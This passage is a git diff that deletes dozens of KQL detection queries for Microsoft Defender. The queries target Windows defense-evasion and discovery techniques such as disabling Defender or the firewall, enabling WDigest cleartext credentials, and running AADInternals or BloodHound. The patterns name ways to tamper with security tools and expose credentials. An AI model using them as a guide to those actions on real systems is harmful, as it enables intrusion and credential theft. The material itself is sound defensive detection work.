-| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql b/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql
deleted file mode 100644
index 0ce9c87e..00000000
--- a/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql b/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql
deleted file mode 100644
index 4339d55a..00000000
--- a/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019/08/25
-// Level: high
-// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
-HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
-This is usually used with UseLogonCredential to manipulate the caching credentials.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\IsCredGuardEnabled"
\ No newline at end of file
diff --git a/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql b/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql
deleted file mode 100644
index a594a1fb..00000000
--- a/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019/09/12
-// Level: high
-// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential"
\ No newline at end of file
diff --git a/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql b/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql
deleted file mode 100644
index 495f7484..00000000
--- a/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
-An example would be a threat actor creating a new user via the net command and providing the password inline
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql b/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql
deleted file mode 100644
index fa5bb1a0..00000000
--- a/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: high
-// Description: Detects Windows executables that write files with suspicious extensions
-// Tags: attack.defense_evasion, attack.t1036
-DeviceFileEvents
-| where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat")))))
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql b/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql
deleted file mode 100644
index 0aebc2e2..00000000
--- a/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/07
-// Level: high
-// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql b/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql
deleted file mode 100644
index 00caa0ec..00000000
--- a/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/07/06
-// Level: medium
-// Description: Detects the Setting of Windows Defender Exclusions
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql b/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql
deleted file mode 100644
index 4734ecfb..00000000
--- a/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
-// Date: 2022/08/01
-// Level: high
-// Description: Detects when an attacker or tool disables the  Windows Defender service (WinDefend) via the registry
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql b/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql
deleted file mode 100644
index 0cc30a00..00000000
--- a/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/14
-// Level: medium
-// Description: Detects attempts to disable the Windows Firewall using PowerShell
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private")
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Kernel_Debugger_Execution.kql b/Defense Evasion/Windows_Kernel_Debugger_Execution.kql
deleted file mode 100644
index 1742c500..00000000
--- a/Defense Evasion/Windows_Kernel_Debugger_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql b/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql
deleted file mode 100644
index 7905e6de..00000000
--- a/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: vburov
-// Date: 2019/02/23
-// Level: low
-// Description: Detect suspicious parent processes of well-known Windows processes
-// Tags: attack.defense_evasion, attack.t1036.003, attack.t1036.005
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "-") or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\")))))
\ No newline at end of file
diff --git a/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Thomas Patzke (improvements)
-// Date: 2021/06/29
-// Level: informational
-// Description: Detect DLL Load from Spooler Service backup folder
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Winget_Admin_Settings_Modification.kql b/Defense Evasion/Winget_Admin_Settings_Modification.kql
deleted file mode 100644
index 4043350a..00000000
--- a/Defense Evasion/Winget_Admin_Settings_Modification.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: low
-// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey startswith "\\REGISTRY\\A"
\ No newline at end of file
diff --git a/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql b/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql
deleted file mode 100644
index 9143ea08..00000000
--- a/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects when the 'AllowMultipleTSSessions' value is enabled.
-Which allows for multiple Remote Desktop connection sessions to be opened at once.
-This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
-
-// Tags: attack.persistence, attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions"
\ No newline at end of file
diff --git a/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql b/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql
deleted file mode 100644
index 5675cce0..00000000
--- a/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, manasmbellani
-// Date: 2022/02/16
-// Level: medium
-// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.
-This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or ((((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m ") and (ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u ")) and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Write_Protect_For_Storage_Disabled.kql b/Defense Evasion/Write_Protect_For_Storage_Disabled.kql
deleted file mode 100644
index d0e57787..00000000
--- a/Defense Evasion/Write_Protect_For_Storage_Disabled.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sreeman
-// Date: 2021/06/11
-// Level: medium
-// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
-This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
-
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage"
\ No newline at end of file
diff --git a/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql b/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql
deleted file mode 100644
index ec001999..00000000
--- a/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/21
-// Level: medium
-// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
-// Tags: attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs")
\ No newline at end of file
diff --git a/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql b/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
deleted file mode 100644
index bd2befa9..00000000
--- a/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql b/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql
deleted file mode 100644
index 206710d7..00000000
--- a/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files.
-Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
-
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv")))
\ No newline at end of file
diff --git a/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql b/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql
deleted file mode 100644
index b29fa211..00000000
--- a/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/09/20
-// Level: high
-// Description: Detects the execution of Xwizard tool from a non-default directory.
-When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll".
-
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql b/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
deleted file mode 100644
index f4819e7d..00000000
--- a/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
-// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/Discovery/Advanced_IP_Scanner_-_File_Event.kql b/Discovery/Advanced_IP_Scanner_-_File_Event.kql
deleted file mode 100644
index f1a91211..00000000
--- a/Discovery/Advanced_IP_Scanner_-_File_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ROxPinTeddy
-// Date: 2020/05/12
-// Level: medium
-// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-// Tags: attack.discovery, attack.t1046
-DeviceFileEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2"
\ No newline at end of file
diff --git a/Discovery/BloodHound_Collection_Files.kql b/Discovery/BloodHound_Collection_Files.kql
deleted file mode 100644
index 2dd9a6ed..00000000
--- a/Discovery/BloodHound_Collection_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: C.J. May
-// Date: 2022/08/09
-// Level: high
-// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
-DeviceFileEvents
-| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql b/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql
deleted file mode 100644
index d04369ff..00000000
--- a/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/10
-// Level: medium
-// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 3aa4acf8..00000000
--- a/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/08
-// Level: medium
-// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
-// Tags: attack.discovery, attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/Console_CodePage_Lookup_Via_CHCP.kql b/Discovery/Console_CodePage_Lookup_Via_CHCP.kql
deleted file mode 100644
index 7179f355..00000000
--- a/Discovery/Console_CodePage_Lookup_Via_CHCP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: _pete_0, TheDFIRReport
-// Date: 2022/02/21
-// Level: medium
-// Description: Detects use of chcp to look up the system locale value as part of host discovery
-// Tags: attack.discovery, attack.t1614.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp  ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k ") and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/Discovery/Detected_Windows_Software_Discovery.kql b/Discovery/Detected_Windows_Software_Discovery.kql
deleted file mode 100644
index 76f1939d..00000000
--- a/Discovery/Detected_Windows_Software_Discovery.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/16
-// Level: medium
-// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
-// Tags: attack.discovery, attack.t1518
-DeviceProcessEvents
-| where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/Discovery/DirLister_Execution.kql b/Discovery/DirLister_Execution.kql
deleted file mode 100644
index d5da06cb..00000000
--- a/Discovery/DirLister_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: low
-// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.
-// Tags: attack.discovery, attack.t1083
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe"
\ No newline at end of file
diff --git a/Discovery/Discovery_of_a_System_Time.kql b/Discovery/Discovery_of_a_System_Time.kql
deleted file mode 100644
index c46edd34..00000000
--- a/Discovery/Discovery_of_a_System_Time.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: low
-// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
-// Tags: attack.discovery, attack.t1124
-DeviceProcessEvents
-| where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe")
\ No newline at end of file
